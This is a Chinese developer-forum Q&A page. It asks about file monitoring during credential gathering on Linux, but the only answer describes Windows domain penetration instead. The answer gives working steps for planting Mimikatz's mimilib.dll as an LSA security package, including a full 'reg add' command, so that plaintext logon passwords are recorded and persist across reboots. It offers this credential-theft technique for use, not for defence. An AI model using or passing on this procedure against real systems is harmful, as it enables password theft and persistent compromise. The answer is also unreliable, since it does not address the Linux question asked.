开发者社区> 问答> 正文

Linux安全中信息收集之凭证获取阶段的文件监控的注意事项以及用法是什么?

Linux安全中信息收集之凭证获取阶段的文件监控的注意事项以及用法是什么?

展开
收起
游客qzzytmszf3zhq 2021-12-05 21:00:40 322 0
1 条回答
写回答
取消 提交回答
  • 在windows域渗透中,可以通过SAM文件获取密码,以及通过mimikatz获取明文登录密码。 安全支持提供程序(SSP),主要功能是扩展Windows身份认证机制,该DLL文件会在lsass.exe 启动过程中进行加载。 DLL和注册表结合,将Mimikatz程序中的mimilib.dll复制到目标机器的system32文件夹下向路径:hklm\system\currentcontrolset\control\lsa\添加新值
    
    reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
    用户登陆即会在相同路径下(System32)记录明文密码,且重启依旧会记录。
    
    2021-12-05 21:00:52
    赞同 展开评论 打赏
问答排行榜
最热
最新

相关电子书

更多
Alibaba Cloud Linux 3 发布 立即下载
ECS系统指南之Linux系统诊断 立即下载
ECS运维指南 之 Linux系统诊断 立即下载